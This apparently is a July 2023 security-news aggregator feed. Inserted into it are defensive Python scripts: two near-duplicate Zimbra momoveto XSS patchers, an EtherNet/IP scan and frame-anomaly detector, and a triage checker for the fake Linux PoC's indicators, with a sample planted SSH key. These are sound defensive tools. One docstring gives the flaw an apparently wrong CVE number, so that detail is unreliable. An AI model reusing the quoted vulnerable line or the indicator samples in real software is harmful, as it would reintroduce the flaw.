                Autosummary: In the interim, it is urging customers to apply a manual fix to eliminate the attack vector: take a backup of the file /opt/zimbra/jetty/webapps/zimbra/m/momoveto, edit this file and go to line number 40, and update the parameter value to <input name="st" type="hidden" value="${fn:escapeXml(param.st)}"/>. Before the update, the line appeared as <input name="st" type="hidden" value="${param.st}"/>. While the company did not disclose details of active exploitation, Google Threat Analysis Group (TAG) researcher Maddie Stone said it discovered the cross-site scripting (XSS) flaw being abused in the wild as part of a targeted attack. "
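The fix quoted here, and in the Malwarebytes item on the same flaw above, is a one-line edit to a JSP file on every mailbox node: the unescaped ${param.st} is what lets attacker-controlled input land in the page, and fn:escapeXml() is what neutralises it. The script below is an added example, not Zimbra's own tooling: it backs the file up, swaps the unescaped expression for the escaped one by matching the line content rather than trusting that it sits at line 40, refuses to touch a file in which neither variant appears, and re-reads the result. The target path and both line variants are the ones the advisory quotes; the .bak suffix and the constructed stand-in file in demo() are assumptions.

```python
"""Apply and verify Zimbra's interim momoveto fix for CVE-2023-34192.

Added example, not Zimbra's own tooling. The target path and the two line
variants are the ones quoted in the advisory; the .bak naming, the demo()
stand-in file and its filler lines are assumptions for illustration.
"""
import shutil
import tempfile
from pathlib import Path

DEFAULT_TARGET = Path("/opt/zimbra/jetty/webapps/zimbra/m/momoveto")
VULNERABLE = '<input name="st" type="hidden" value="${param.st}"/>'
FIXED = '<input name="st" type="hidden" value="${fn:escapeXml(param.st)}"/>'


def patch_status(text):
    """Classify file content: 'fixed', 'vulnerable', or 'unknown' when neither
    variant is present (a different build; do not edit it blindly)."""
    if FIXED in text:
        return "fixed"
    if VULNERABLE in text:
        return "vulnerable"
    return "unknown"


def find_line(text, needle):
    """1-based number of the first line containing needle, or None. The
    advisory says line 40; matching on content avoids depending on that."""
    for number, line in enumerate(text.splitlines(), start=1):
        if needle in line:
            return number
    return None


def apply_fix(path=DEFAULT_TARGET):
    """Back up the file, replace the unescaped expression, re-read and return
    the resulting status. Idempotent: an already-fixed or unrecognised file
    is left untouched, so the script is safe to run on every mailbox node."""
    path = Path(path)
    text = path.read_text(encoding="utf-8")
    status = patch_status(text)
    if status != "vulnerable":
        return status
    shutil.copy2(path, path.with_name(path.name + ".bak"))
    path.write_text(text.replace(VULNERABLE, FIXED), encoding="utf-8")
    return patch_status(path.read_text(encoding="utf-8"))


def demo():
    """Exercise apply_fix() on a constructed stand-in: 39 filler lines, the
    vulnerable line at line 40 (as in the advisory), then one more line."""
    with tempfile.TemporaryDirectory() as tmp:
        target = Path(tmp) / "momoveto"
        filler = "\n".join(f"<%-- filler line {i} --%>" for i in range(1, 40))
        target.write_text(f"{filler}\n{VULNERABLE}\n<%-- line 41 --%>\n", encoding="utf-8")
        original = target.read_text(encoding="utf-8")
        first_run = apply_fix(target)
        second_run = apply_fix(target)      # nothing left to do the second time
        patched = target.read_text(encoding="utf-8")
        backup = (Path(tmp) / "momoveto.bak").read_text(encoding="utf-8")
        return {
            "before": patch_status(original),
            "after_first_run": first_run,
            "after_second_run": second_run,
            "line_before": find_line(original, VULNERABLE),
            "line_after": find_line(patched, FIXED),
            "backup_is_original": backup == original,
            "vulnerable_left": VULNERABLE in patched,
        }


if __name__ == "__main__":
    print(demo())
```

For the real file, call apply_fix() with no argument as the zimbra user on each mailbox node; per the advisory no service restart is needed. Keep the .bak until the next ZCS patch replaces the file, and re-run patch_status() after any upgrade, since a package update may overwrite the hand-edited file.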


                Colorado State University says data breach impacts students, staff

                financial government
                2023-07-14 https://www.bleepingcomputer.com/news/security/colorado-state-university-says-data-breach-impacts-students-staff/
                Colorado State University (CSU) has confirmed that the Clop ransomware operation stole sensitive personal information of current and former students and employees during the recent MOVEit Transfer data-theft attacks. [...] "

                Autosummary: "Some data about prospective, current, and former CSU students and current and former employees maintained by the affected vendors contains personally identifiable information, which may include first name, middle initial, last name, date of birth, student or employee identification numbers, social security number, and demographic information such as gender, ethnicity, and level and area of education." "


                Rockwell warns of new APT RCE exploit targeting critical infrastructure

                exploits
                2023-07-14 https://www.bleepingcomputer.com/news/security/rockwell-warns-of-new-apt-rce-exploit-targeting-critical-infrastructure/
                Rockwell Automation says a new remote code execution (RCE) exploit linked to an unnamed Advanced Persistent Threat (APT) group could be used to target unpatched ControlLogix communications modules commonly used in manufacturing, electric, oil and gas, and liquefied natural gas industries. [...] "

                Autosummary: "Rockwell Automation, in coordination with the U.S. government, has analyzed a novel exploit capability attributed to Advanced Persistent Threat (APT) actors affecting select communication modules," the company said in a security advisory accessible only after logging in. "


                Four zero-days make July's Patch Tuesday a "patch now" update

                exploits
                2023-07-14 https://www.computerworld.com/article/3702731/four-zero-days-make-july-s-patch-tuesday-a-patch-now-update.html#tk.rss_security
                "

                Autosummary: Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge); Microsoft Windows (both desktop and server); Microsoft Office; Microsoft Exchange Server; Microsoft Development platforms (ASP.NET Core, .NET). Windows: Microsoft released eight critical updates and 95 patches rated as important to the Windows platform, covering these key components: Windows Layer-2 Bridge Network Driver (CVE-2023-35315); Windows Remote Desktop (CVE-2023-35352); Windows Routing and Remote Access Service (RRAS) (CVE-2023-35365); Windows Message Queuing (CVE-2023-32057). We also have four zero-days to manage for Windows (CVE-2023-32046, CVE-2023-32049, CVE-2023-36874 and CVE-2023-36884), bringing the Windows platform into a "patch now" schedule. Microsoft development platforms: Compared to the very serious (and numerous) exploits in Office and Windows this month, there are only five updates affecting Visual Studio, ASP.NET and a minor component of Mono (the cross platform C# implementation). "


                Former contractor accused of remotely accessing town’s water treatment facility

                financial
                2023-07-14 https://www.tripwire.com/state-of-security/former-contractor-accused-remotely-accessing-towns-water-treatment-facility
                A federal grand jury has indicted a former employee of a contractor operating a California town's wastewater treatment facility, alleging that he remotely turned off critical systems and could have endangered public health and safety. Read more in my article on the Tripwire State of Security blog.

                Autosummary: Gallo accessed the facility's computer system remotely and "transmitted a command to uninstall software that was the main hub of the facility’s computer network and that protected the entire water treatment system, including water pressure, filtration, and chemical levels."


                Ransomware making big money through "big game hunting"

                financial exploits
                2023-07-14 https://www.malwarebytes.com/blog/news/2023/07/ransomware-making-big-money-through-big-game-hunting

                We take a look at reports that claim ransomware is making big money in 2023.

                Autosummary: Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Back in the realm of ransomware, things aren’t perhaps quite as good, with some of the big hitters from our June ransomware review serving up exploits, dubious “charity donation” requests, and an increase in attacks on education. Threats to leak data, sell it online, break other parts of the business, attack related firms, or even harass employees are all tactics ransomware authors can make use of.


                20% of malware attacks bypass antivirus protection

                exploits
                2023-07-13 https://www.helpnetsecurity.com/2023/07/13/malware-infections-responses/

                Security leaders are concerned about attacks that leverage malware-exfiltrated authentication data, with 53% expressing extreme concern and less than 1% admitting they weren’t concerned at all, according to SpyCloud. However, many still lack the necessary tools to investigate the security and organizational impact of these infections and effectively mitigate follow-on attacks – with 98% indicating better visibility into at-risk applications would significantly improve their security posture. The struggle for IT security teams While increased visibility … More


                Autosummary: With this struggle for visibility and comprehensive response, there is a clear need for security teams to implement a more robust, identity-centric Post-Infection Remediation approach to disrupt criminals before they are able to use malware-exfiltrated data to further harm the business.


                Microsoft: China accused of hacking US government emails

                government
                2023-07-13 https://www.bbc.co.uk/news/business-66184678?at_medium=RSS&at_campaign=KARANGA
                The US Secretary of Commerce was among those impacted by the breach, according to reports.


                GST: New tax threatens India's booming online gaming industry

                industry
                2023-07-13 https://www.bbc.co.uk/news/world-asia-india-66161596?at_medium=RSS&at_campaign=KARANGA
                The industry says it has been blindsided by the government's "catastrophic" tax decision.


                USB drive malware attacks spiking again in first half of 2023

                exploits
                2023-07-13 https://www.bleepingcomputer.com/news/security/usb-drive-malware-attacks-spiking-again-in-first-half-of-2023/
                What's old is new again, with researchers seeing a threefold increase in malware distributed through USB drives in the first half of 2023 [...]

                Autosummary: The victims of Sogu malware are located in the United States, France, the UK, Italy, Poland, Austria, Australia, Switzerland, China, Japan, Ukraine, Singapore, Indonesia, and the Philippines.


                Rockwell Automation ControlLogix Bugs Expose Industrial Systems to Remote Attacks

                exploits industry
                2023-07-13 https://thehackernews.com/2023/07/rockwell-automation-controllogix-bugs.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has alerted of two security flaws impacting Rockwell Automation ControlLogix EtherNet/IP (ENIP) communication module models that could be exploited to achieve remote code execution and denial-of-service (DoS). "The results and impact of exploiting these vulnerabilities vary depending on the ControlLogix system configuration, but

                Autosummary: Impacted devices include 1756-EN2T, 1756-EN2TK, 1756-EN2TXT, 1756-EN2TP, 1756-EN2TPK, 1756-EN2TPXT, 1756-EN2TR, 1756-EN2TRK, 1756-EN2TRXT, 1756-EN2F, 1756-EN2FK, 1756-EN3TR, 1756-EN3TRK, 1756-EN4TR, 1756-EN4TRK, and 1756-EN4TRXT.


                U.S. Government Agencies" Emails Compromised in China-Backed Cyber Attack

                government
                2023-07-13 https://thehackernews.com/2023/07/us-government-agencies-emails.html
                An unnamed Federal Civilian Executive Branch (FCEB) agency in the U.S. detected anomalous email activity in mid-June 2023, leading to Microsoft's discovery of a new China-linked espionage campaign targeting two dozen organizations. The details come from a joint cybersecurity advisory released by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation

                Autosummary: "In June 2023, a Federal Civilian Executive Branch (FCEB) agency identified suspicious activity in their Microsoft 365 (M365) cloud environment," the authorities said.


                SonicWall urges organizations to fix critical flaws in GMS/Analytics products

                industry
                2023-07-13 https://securityaffairs.com/148411/security/sonicwall-critical-flaws-gms-analytics.html

                SonicWall fixed multiple critical vulnerabilities impacting its GMS firewall management and Analytics management and reporting engine. SonicWall addressed multiple critical vulnerabilities in its Global Management System (GMS) firewall management and Analytics network management and reporting engine. The company fixed 15 vulnerabilities that were disclosed in a Coordinated Vulnerability Disclosure (CVD) report in conjunction with NCC Group. […]


                Unnamed APT eyes vulnerabilities in Rockwell Automation industrial controllers (CVE-2023-3595 CVE-2023-3596)

                industry
                2023-07-13 https://www.helpnetsecurity.com/2023/07/13/cve-2023-3595-cve-2023-3596/

                Rockwell Automation has fixed two vulnerabilities (CVE-2023-3595, CVE-2023-3596) in the communication modules of its ControlLogix industrial programmable logic controllers (PLCs), ahead of expected (and likely) in-the-wild exploitation. “An unreleased exploit capability leveraging these vulnerabilities is associated with an unnamed APT (Advanced Persistent Threat) group,” industrial cybersecurity company Dragos has stated on Wednesday. About the vulnerabilities (CVE-2023-3595, CVE-2023-3596) CVE-2023-3595 allows attackers to manipulate firmware memory, perform remote code execution with persistence, and modify, deny, and exfiltrate … More


                Autosummary: The CIP Socket Object should be disabled, if possible, they say, and organizations should monitor for: unexpected or out-of-specification CIP packets to CIP objects implemented in ControlLogix communications modules; unknown scanning on a network for CIP-enabled devices; unscheduled firmware updates or logic downloads; unexpected disabling of secure boot options; arbitrary writes to communication module memory or firmware; and uncommon firmware file names. “Knowing about an APT-owned vulnerability before exploitation is a rare opportunity for proactive defense for critical industrial sectors.”
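The monitoring points Dragos lists above can be turned into concrete checks. The following is an added example in Python, not code from Help Net Security, Dragos or Rockwell: it parses the 24-byte EtherNet/IP encapsulation header and flags frames whose command, length or options fields are out of specification, counts how many hosts receive ListIdentity probes from a single source (CIP discovery scanning on port 44818), and flags CIP requests addressed to the Socket Object. The flow-record layout, the sample records and frames, the five-target scan threshold and the Socket Object class code 0x342 are assumptions made for the example; the flow records would normally come from a network dissector that already decodes the CIP class in each request.

```python
import struct
from collections import defaultdict

# Added example, not part of the Help Net Security article or the Dragos advisory it quotes.
# 24-byte EtherNet/IP encapsulation header, little-endian:
# command u16, length u16, session handle u32, status u32, sender context 8 bytes, options u32.
ENIP_HEADER = struct.Struct("<HHII8sI")
ENIP_PORT = 44818
ENIP_COMMANDS = {
    0x0000: "NOP", 0x0004: "ListServices", 0x0063: "ListIdentity", 0x0064: "ListInterfaces",
    0x0065: "RegisterSession", 0x0066: "UnRegisterSession", 0x006F: "SendRRData",
    0x0070: "SendUnitData",
}
# Assumption: 0x342 is the class code of the CIP Socket Object the advisory says to disable or watch.
SOCKET_OBJECT_CLASS = 0x342


def parse_enip_header(frame):
    """Parse one encapsulation frame and list anything that violates the header rules."""
    problems = []
    if len(frame) < ENIP_HEADER.size:
        return {"command": None, "problems": ["truncated header (%d bytes)" % len(frame)]}
    cmd, length, session, status, _ctx, options = ENIP_HEADER.unpack_from(frame)
    payload_len = len(frame) - ENIP_HEADER.size
    if cmd not in ENIP_COMMANDS:
        problems.append("unknown command 0x%04x" % cmd)
    if length != payload_len:                      # length must equal the bytes after the header
        problems.append("length field %d != payload %d" % (length, payload_len))
    if options != 0:                               # the spec requires the options field to be zero
        problems.append("options field %d is not zero" % options)
    return {"command": ENIP_COMMANDS.get(cmd, "0x%04x" % cmd), "length": length,
            "session": session, "status": status, "problems": problems}


def detect_cip_scanning(flows, min_targets=5):
    """Sources that sent ListIdentity to at least min_targets distinct hosts on 44818."""
    targets = defaultdict(set)
    for f in flows:
        if f["dport"] == ENIP_PORT and f["command"] == "ListIdentity":
            targets[f["src"]].add(f["dst"])
    return {src: sorted(hosts) for src, hosts in targets.items() if len(hosts) >= min_targets}


def detect_socket_object_requests(flows):
    """CIP requests addressed to the Socket Object class."""
    return [f for f in flows if f.get("cip_class") == SOCKET_OBJECT_CLASS]


# Constructed flow records (not real traffic): one host sweeping a /24 for CIP devices, and an
# engineering workstation talking to one module, once to the Identity object (class 0x01) and
# once to the Socket Object.
SAMPLE_FLOWS = [
    {"src": "10.0.5.77", "dst": "10.0.5.%d" % i, "dport": ENIP_PORT,
     "command": "ListIdentity", "cip_class": None} for i in range(10, 18)
] + [
    {"src": "10.0.1.20", "dst": "10.0.5.10", "dport": ENIP_PORT, "command": "SendRRData", "cip_class": 0x01},
    {"src": "10.0.1.20", "dst": "10.0.5.10", "dport": ENIP_PORT, "command": "SendRRData",
     "cip_class": SOCKET_OBJECT_CLASS},
]

# Constructed frames: a well-formed RegisterSession (4-byte payload: protocol version 1, flags 0)
# and a copy whose length field claims 100 payload bytes that are not there.
GOOD_FRAME = ENIP_HEADER.pack(0x0065, 4, 0, 0, b"\x00" * 8, 0) + b"\x01\x00\x00\x00"
BAD_FRAME = ENIP_HEADER.pack(0x0065, 100, 0, 0, b"\x00" * 8, 0) + b"\x01\x00\x00\x00"


def analyze(flows=SAMPLE_FLOWS, frames=(GOOD_FRAME, BAD_FRAME)):
    """Return human-readable findings for the three monitoring points."""
    findings = []
    for src, hosts in detect_cip_scanning(flows).items():
        findings.append("possible CIP discovery scan: %s -> %d hosts" % (src, len(hosts)))
    for f in detect_socket_object_requests(flows):
        findings.append("Socket Object (0x342) request: %s -> %s" % (f["src"], f["dst"]))
    for frame in frames:
        hdr = parse_enip_header(frame)
        for p in hdr["problems"]:
            findings.append("out-of-spec ENIP frame (%s): %s" % (hdr["command"], p))
    return findings


if __name__ == "__main__":
    for line in analyze():
        print(line)
```

The scan threshold and the list of sources allowed to issue ListIdentity (asset-inventory tools do it legitimately) need tuning per site; the point of the header check is that a module's parser is exactly what a memory-corruption exploit would feed malformed frames to, so frames that fail the length or options rule deserve a look even when they come from a known host.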


                White House publishes National Cybersecurity Strategy Implementation Plan

                ciber
                2023-07-13 https://www.helpnetsecurity.com/2023/07/13/national-cybersecurity-strategy-implementation-plan-published/

                The Biden-Harris Administration’s recently released National Cybersecurity Strategy calls for two fundamental shifts in how the United States allocates roles, responsibilities, and resources in cyberspace: ensuring that the biggest, most capable, and best-positioned entities – in the public and private sectors – assume a greater share of the burden for mitigating cyber risk; and increasing incentives to favor long-term investments into cybersecurity. Today, the Administration is announcing a roadmap to realize this vision. It is taking … More

                Autosummary: A complementary initiative, led by CISA, will include offering resources such as training, cybersecurity services, technical assessments, pre-attack planning, and incident response to high-risk targets of ransomware, like hospitals and schools, to make them less likely to be affected and to reduce the scale and duration of impacts if they are attacked.


                Fake PoC for Linux Kernel Vulnerability on GitHub Exposes Researchers to Malware

                exploits
                2023-07-13 https://thehackernews.com/2023/07/blog-post.html
                In a sign that cybersecurity researchers continue to be under the radar of malicious actors, a proof-of-concept (PoC) has been discovered on GitHub, concealing a backdoor with a "crafty" persistence method. "In this instance, the PoC is a wolf in sheep's clothing, harboring malicious intent under the guise of a harmless learning tool," Uptycs researchers Nischay Hegde and Siddartha Malladi said.

                Autosummary: "While it can be challenging to distinguish legitimate PoCs from deceptive ones, adopting safe practices such as testing in isolated environments (e.g., virtual machines) can provide a layer of protection," the researchers said.


                Google's ChatGPT rival Bard launches in Europe and Brazil

                latam
                2023-07-13 https://www.bbc.co.uk/news/technology-66187283?at_medium=RSS&at_campaign=KARANGA
                Google’s Bard artificial intelligence chatbot can now also talk and respond to visual prompts.


                Zimbra urges admins to manually fix zero-day exploited in attacks

                exploits
                2023-07-13 https://www.bleepingcomputer.com/news/security/zimbra-urges-admins-to-manually-fix-zero-day-exploited-in-attacks/
                Zimbra urged admins today to manually fix a zero-day vulnerability actively exploited to target and compromise Zimbra Collaboration Suite (ZCS) email servers. [...]

                Autosummary: The procedure needed to mitigate the vulnerability across all mailbox nodes manually requires admins to go through the following steps: (1) take a backup of the file /opt/zimbra/jetty/webapps/zimbra/m/momoveto; (2) edit this file and go to line number 40; (3) update the parameter value to <input name="st" type="hidden" value="${fn:escapeXml(param.st)}"/> (before the update, the line appeared as <input name="st" type="hidden" value="${param.st}"/>). The inclusion of the escapeXml() function will now sanitize the user-inputted data by escaping special characters used in XML markup to prevent XSS flaws.
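A one-line edit repeated by hand on every mailbox node is easy to get wrong or apply twice. As an added example, not Zimbra's own tooling or code from the article, the Python script below backs up momoveto, replaces the unescaped ${param.st} with the fn:escapeXml() form, refuses to double-apply, and reports which line now carries the fix so the result can be compared with the advisory's line 40. The backup naming scheme, the assumption that the attribute is written exactly as value="${param.st}", and the constructed sample file used by demo() are the example's own.

```python
import re
import shutil
import tempfile
import time
from pathlib import Path

# Added example, not Zimbra's own tooling: applies the manual mitigation described in the advisory.
MOMOVETO = Path("/opt/zimbra/jetty/webapps/zimbra/m/momoveto")
# The unescaped expression admins are told to replace, and its escaped form.
VULNERABLE_RE = re.compile(r'value="\$\{param\.st\}"')
FIXED_VALUE = 'value="${fn:escapeXml(param.st)}"'
# Constructed copy of the affected line, used only by demo() below.
VULNERABLE_LINE = '<input name="st" type="hidden" value="${param.st}"/>'


def patch_text(text):
    """Return (new_text, changed). Already-patched input is returned unchanged."""
    if FIXED_VALUE in text:
        return text, False
    if not VULNERABLE_RE.search(text):
        raise ValueError("unescaped ${param.st} not found; inspect the file by hand")
    # A callable replacement avoids any backslash/group processing of the replacement string.
    return VULNERABLE_RE.sub(lambda _m: FIXED_VALUE, text, count=1), True


def is_patched(text):
    return FIXED_VALUE in text and VULNERABLE_RE.search(text) is None


def fixed_line_number(text):
    """1-based line that now carries the escaped value (the advisory says line 40), or None."""
    for n, line in enumerate(text.splitlines(), 1):
        if FIXED_VALUE in line:
            return n
    return None


def patch_file(path=MOMOVETO):
    """Back the file up (step 1 of the procedure), rewrite it, and report whether it changed."""
    path = Path(path)
    original = path.read_text()
    new_text, changed = patch_text(original)
    if changed:
        backup = path.with_name(path.name + ".bak." + time.strftime("%Y%m%d%H%M%S"))
        shutil.copy2(path, backup)          # keep mode/ownership metadata of the original
        path.write_text(new_text)
    return changed


def demo():
    """Exercise the patcher on a constructed momoveto copy in a temporary directory."""
    work = Path(tempfile.mkdtemp())
    sample = work / "momoveto"
    sample.write_text("\n".join(["<!-- constructed filler -->"] * 39 + [VULNERABLE_LINE]) + "\n")
    first = patch_file(sample)
    second = patch_file(sample)             # second run must be a no-op
    text = sample.read_text()
    return {"changed_first": first, "changed_second": second, "patched": is_patched(text),
            "line": fixed_line_number(text), "backups": len(list(work.glob("momoveto.bak.*")))}


if __name__ == "__main__":
    print(demo())
```

Run it as the zimbra user on each mailbox node (the default path is the one from the advisory); a ValueError means the file does not look like the advisory's description and should be inspected rather than edited blindly.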


                Source code for BlackLotus Windows UEFI malware leaked on GitHub

                exploits
                2023-07-13 https://www.bleepingcomputer.com/news/security/source-code-for-blacklotus-windows-uefi-malware-leaked-on-github/
                The source code for the BlackLotus UEFI bootkit has leaked online, allowing greater insight into a malware that has caused great concern among the enterprise, governments, and the cybersecurity community. [...]

                Autosummary: [Figure: Leaked BlackLotus source code on GitHub (Source: BleepingComputer)] "The leaked source code isn't complete and contains mainly the rootkit part and bootkit code to bypass Secure Boot," stated Binarly's co-founder and CEO Alex Matrosov.


                Cyberattacks through Browser Extensions – the Importance of MFA

                ciber
                2023-07-13 https://www.bleepingcomputer.com/news/security/cyberattacks-through-browser-extensions-the-importance-of-mfa/
                More and more attacks are occurring via browser extensions or user-profile installations of tools. Learn more about these attacks from Specops Software and what you can do to protect yourself. [...]

                Autosummary: Multiple identity services such as SMS, Email, Fingerprint Readers, Trusted Network Locations, Manager Verification, Duo, Okta, Symantec VIP, Microsoft & Google Authenticator, Google, Facebook, Twitter, and more. Mitigating attacks with Specops uReset: using tools like Specops uReset, which leverages multiple weighted factors to ensure that only the correct user can reset a password, provides a secure and fast method for a helpdesk to quickly take control of a bad situation.


                PicassoLoader Malware Used in Ongoing Attacks on Ukraine and Poland

                exploits
                2023-07-13 https://thehackernews.com/2023/07/picassoloader-malware-used-in-ongoing.html
                Government entities, military organizations, and civilian users in Ukraine and Poland have been targeted as part of a series of campaigns designed to steal sensitive data and gain persistent remote access to the infected systems. The intrusion set, which stretches from April 2022 to July 2023, leverages phishing lures and decoy documents to deploy a downloader malware called PicassoLoader, which

                Autosummary: This comprises taking advantage of living-on-the-edge infrastructure to gain initial access, using living-off-the-land techniques to conduct reconnaissance, lateral movement and information theft to limit their malware footprint and evade detection, creating persistent, privileged access via group policy objects (GPO), deploying wipers, and telegraphing their acts via hacktivist personas on Telegram.


                Chinese hackers compromised emails of U.S. Government agencies

                government
                2023-07-13 https://securityaffairs.com/148422/intelligence/chinese-hackers-compromised-emails-us-gov.html

                Chinese hackers have compromised the emails of an unnamed US Federal Civilian Executive Branch (FCEB) agency. In mid-June, malicious email activity was reported by the agency. Microsoft experts who investigated the suspicious activity discovered that China-linked threat actors have targeted the agency as part of a cyberespionage […]

                Autosummary: US CISA urges organizations to enable audit logging, enable Purview Audit (Premium) logging, ensure logs are searchable by operators, enable Microsoft 365 Unified Audit Logging (UAL), and understand the organization’s cloud baseline.


                Google Play will enforce business checks to curb malware submissions

                exploits
                2023-07-13 https://www.bleepingcomputer.com/news/google/google-play-will-enforce-business-checks-to-curb-malware-submissions/
                Google is fighting back against the constant invasion of malware on Google Play by requiring all new developer accounts registering as an organization to provide a valid D-U-N-S number before submitting apps. [...]

                Autosummary: Previously, this section hosted the developer's name, email, and location, but now it will also include the company name, complete office address, website URL, and phone number.


                Fake Linux vulnerability exploit drops data-stealing malware

                exploits
                2023-07-13 https://www.bleepingcomputer.com/news/security/fake-linux-vulnerability-exploit-drops-data-stealing-malware/
                Cybersecurity researchers and threat actors are targeted by a fake proof of concept (PoC) CVE-2023-35829 exploit that installs a Linux password-stealing malware. [...]

                Autosummary: Uptycs suggests that researchers who downloaded and used the fake PoC perform the following steps: remove any unauthorized ssh keys; delete the kworker file; remove the kworker path from the bashrc file; and check /tmp/.iCE-unix.pid for potential threats. PoCs downloaded from the internet should be tested on sandboxed/isolated environments like virtual machines and, if possible, have their code inspected before execution.
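The clean-up list above doubles as a triage checklist for anyone who ran the PoC. As an added example, not Uptycs' code, the Python below checks the four indicators on a set of inputs: rc-file lines that reference the kworker payload, authorized_keys entries whose key material is outside an allowlist, a regular file named kworker, and the presence of /tmp/.iCE-unix.pid. The sample bashrc, authorized_keys, allowlist and path set are constructed for the example; the triage_host() helper that reads a real home directory, and the allowlist it expects the operator to supply, are assumptions about how it would be deployed.

```python
from pathlib import Path

# Added example, not Uptycs' tooling: checks the four indicators from the write-up.
KEY_TYPES = ("ssh-", "ecdsa-", "sk-")   # authorized_keys key-type prefixes
KWORKER = "kworker"                      # name of the dropped payload
ICE_PID = "/tmp/.iCE-unix.pid"           # file the write-up says to check


def key_blob(line):
    """Base64 key material from an authorized_keys entry (with or without leading options)."""
    parts = line.split()
    for i, tok in enumerate(parts[:-1]):
        if tok.startswith(KEY_TYPES):
            return parts[i + 1]
    return None


def unknown_ssh_keys(authorized_keys_text, known_blobs):
    """(line number, key blob or raw line) for entries not in the allowlist or not parseable."""
    findings = []
    for n, line in enumerate(authorized_keys_text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        blob = key_blob(line)
        if blob is None or blob not in known_blobs:
            findings.append((n, blob or line))
    return findings


def kworker_rc_lines(rc_text):
    """Non-comment lines of a shell rc file that launch or reference the kworker payload."""
    return [(n, l) for n, l in enumerate(rc_text.splitlines(), 1)
            if not l.lstrip().startswith("#") and KWORKER in l]


def triage(rc_text, authorized_keys_text, known_blobs, existing_paths):
    """Combine the checks; existing_paths is the set of file paths present on the host."""
    findings = []
    for n, line in kworker_rc_lines(rc_text):
        findings.append("rc file line %d references kworker: %s" % (n, line.strip()))
    for n, blob in unknown_ssh_keys(authorized_keys_text, known_blobs):
        findings.append("authorized_keys line %d not in allowlist: %s" % (n, blob[:24]))
    for p in sorted(existing_paths):
        if Path(p).name == KWORKER:
            findings.append("payload file present: %s" % p)
    if ICE_PID in existing_paths:
        findings.append("%s present" % ICE_PID)
    return findings


def triage_host(known_blobs, home=None):
    """Run the checks on a real home directory (reads ~/.bashrc and ~/.ssh/authorized_keys)."""
    home = Path(home or Path.home())
    rc, ak = home / ".bashrc", home / ".ssh" / "authorized_keys"
    present = {str(p) for p in home.rglob(KWORKER) if p.is_file()}   # can be slow on large homes
    if Path(ICE_PID).exists():
        present.add(ICE_PID)
    return triage(rc.read_text() if rc.exists() else "",
                  ak.read_text() if ak.exists() else "", known_blobs, present)


# Constructed inputs (not taken from a real host).
SAMPLE_BASHRC = (
    "# ~/.bashrc\n"
    "export PATH=$HOME/bin:$PATH\n"
    "alias ll='ls -la'\n"
    "$HOME/.local/kworker &\n"
)
SAMPLE_AUTH_KEYS = (
    "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKnownKeyMaterialForDemo dev@laptop\n"
    'command="/usr/bin/true" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDPlantedKeyMaterial attacker\n'
)
KNOWN_BLOBS = {"AAAAC3NzaC1lZDI1NTE5AAAAIKnownKeyMaterialForDemo"}
SAMPLE_PATHS = {"/home/dev/.bashrc", "/home/dev/.local/kworker", "/tmp/.iCE-unix.pid"}


def demo():
    return triage(SAMPLE_BASHRC, SAMPLE_AUTH_KEYS, KNOWN_BLOBS, SAMPLE_PATHS)


if __name__ == "__main__":
    for line in demo():
        print(line)
```

The allowlist is the important input: comparing key blobs rather than comments catches a planted key that reuses a familiar comment string, and an entry that cannot be parsed is reported rather than ignored. Removing the findings (keys, file, rc line) is still a manual step, after the host has been isolated.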


                Apple re-released Rapid Security Response to fix recently disclosed zero-day

                exploits
                2023-07-13 https://securityaffairs.com/148441/security/apple-second-rapid-security-response.html

                Apple re-released its Rapid Security Response updates for iOS and macOS after fixing browsing issues on certain websites caused by the first RSR. Apple has re-released its Rapid Security Response updates to address the CVE-2023-37450 flaw in iOS and macOS after fixing browsing issues on certain websites caused by the first RSR issued by the […]



                Zimbra urges customers to manually fix actively exploited zero-day reported by Google TAG

                exploits
                2023-07-13 https://securityaffairs.com/148429/hacking/zimbra-collaboration-suite-zeroday.html

                Zimbra has released updates to address a zero-day vulnerability actively exploited in attacks aimed at Zimbra Collaboration Suite (ZCS) email servers, and urges customers to install them manually. Zimbra Collaboration Suite is a comprehensive open-source messaging and […]


                From Malvertising to Ransomware: A ThreatDown webinar recap

                exploits ransomware
                2023-07-13 https://www.malwarebytes.com/blog/business/2023/07/inside-the-pervasive-malvertising-threat-a-threatdown-webinar-recap

                Get the low-down on our recent webinar From Malvertising to Ransomware.


                Ransomware review: July 2023

                exploits
                2023-07-13 https://www.malwarebytes.com/blog/threat-intelligence/2023/07/ransomware-review-july-2023

                Following a three-month lull of activity, Cl0p returned with a vengeance in June and beat out LockBit as the month’s most active ransomware gang.

                Autosummary: [Figures: Known ransomware attacks by country, June 2023; Known ransomware attacks by industry sector, June 2023] Cl0p's precipitous rise to the top of the charts this month, on the other hand, can be explained by their exploitation of a zero-day in MOVEit Transfer, a widely used file transfer software. As for who was hit the hardest, around 16 percent of ransomware incidents affecting State, Local, Tribal, and Territorial (SLTT) governments were from LockBit, says the MS-ISAC.


                Zero-day deploys remote code execution vulnerability via Word documents

                exploits
                2023-07-13 https://www.malwarebytes.com/blog/news/2023/07/zero-day-deploys-remote-code-execution-vulnerability-via-word-documents

                We take a look at reports of an exploit being deployed via booby trapped Word documents.

                Autosummary: Microsoft gives the following advice for organisations concerned with the potential threat of compromise from the most recent attacks (CVE-2023-36884 specific recommendations): customers who use Microsoft Defender for Office 365 are protected from attachments that attempt to exploit CVE-2023-36884.


                Cybersecurity pro charged with $9 million cryptocurrency exchange hack

                ciber
                2023-07-13 https://www.bitdefender.com/blog/hotforsecurity/cybersecurity-pro-charged-with-9-million-cryptocurrency-exchange-hack/
                A computer security engineer has been charged in connection with a multi-million dollar hack of a cryptocurrency exchange. Read more in my article on the Hot for Security blog.


                Malwarebytes stops 100% of Advanced Threats in latest AV-Test assessment

                exploits
                2023-07-13 https://www.malwarebytes.com/blog/business/2023/07/malwarebytes-stops-100-of-advanced-threats-in-latest-av-test-assessment

                The test evaluates products against the latest techniques used by data stealers and ransomware.


                Staying ahead of the “professionals”: The service-oriented ransomware crime industry

                exploits ransomware industry
